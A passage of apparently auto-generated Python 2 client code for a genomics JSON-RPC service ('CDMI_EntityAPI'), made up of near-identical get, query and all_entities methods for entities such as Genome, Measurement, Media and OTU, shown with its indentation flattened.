'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Feature(self, start, count, fields):
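        """Return the requested fields for count Feature entities from offset start."""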
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Feature',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Genome(self, ids, fields):
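        """Return the requested fields for each Genome entity named in ids."""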
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Genome',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Genome(self, qry, fields):
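        """Return the requested fields for Genome entities matching qry."""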
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Genome',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Genome(self, start, count, fields):
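        """Return the requested fields for count Genome entities from offset start."""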
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Genome',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Locality(self, ids, fields):
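        """Return the requested fields for each Locality entity named in ids."""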
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Locality',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Locality(self, qry, fields):
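        """Return the requested fields for Locality entities matching qry."""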
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Locality',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Locality(self, start, count, fields):
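        """Return the requested fields for count Locality entities from offset start."""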
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Locality',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_LocalizedCompound(self, ids, fields):
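        """Return the requested fields for each LocalizedCompound entity named in ids."""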
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_LocalizedCompound',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_LocalizedCompound(self, qry, fields):
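        """Return the requested fields for LocalizedCompound entities matching qry."""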
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_LocalizedCompound',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_LocalizedCompound(self, start, count, fields):
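        """Return the requested fields for count LocalizedCompound entities from offset start."""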
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_LocalizedCompound',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Location(self, ids, fields):
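        """Return the requested fields for each Location entity named in ids."""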
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Location',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Location(self, qry, fields):
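        """Return the requested fields for Location entities matching qry."""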
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Location',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Location(self, start, count, fields):
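        """Return the requested fields for count Location entities from offset start."""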
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Location',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_LocationInstance(self, ids, fields):
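        """Return the requested fields for each LocationInstance entity named in ids."""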
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_LocationInstance',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_LocationInstance(self, qry, fields):
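        """Return the requested fields for LocationInstance entities matching qry."""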
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_LocationInstance',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_LocationInstance(self, start, count, fields):
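        """Return the requested fields for count LocationInstance entities from offset start."""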
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_LocationInstance',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Measurement(self, ids, fields):
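        """Return the requested fields for each Measurement entity named in ids."""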
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Measurement',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Measurement(self, qry, fields):
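        """Return the requested fields for Measurement entities matching qry."""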
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Measurement',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Measurement(self, start, count, fields):
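        """Return the requested fields for count Measurement entities from offset start."""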
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Measurement',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_MeasurementDescription(self, ids, fields):
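        """Return the requested fields for each MeasurementDescription entity named in ids."""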
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_MeasurementDescription',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_MeasurementDescription(self, qry, fields):
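        """Return the requested fields for MeasurementDescription entities matching qry."""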
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_MeasurementDescription',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_MeasurementDescription(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_MeasurementDescription',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Media(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Media',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Media(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Media',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Media(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Media',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Model(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Model',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Model(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Model',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Model(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Model',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_OTU(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_OTU',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_OTU(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_OTU',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_OTU(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_OTU',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ObservationalUnit(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ObservationalUnit',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ObservationalUnit(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ObservationalUnit',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ObservationalUnit(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ObservationalUnit',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
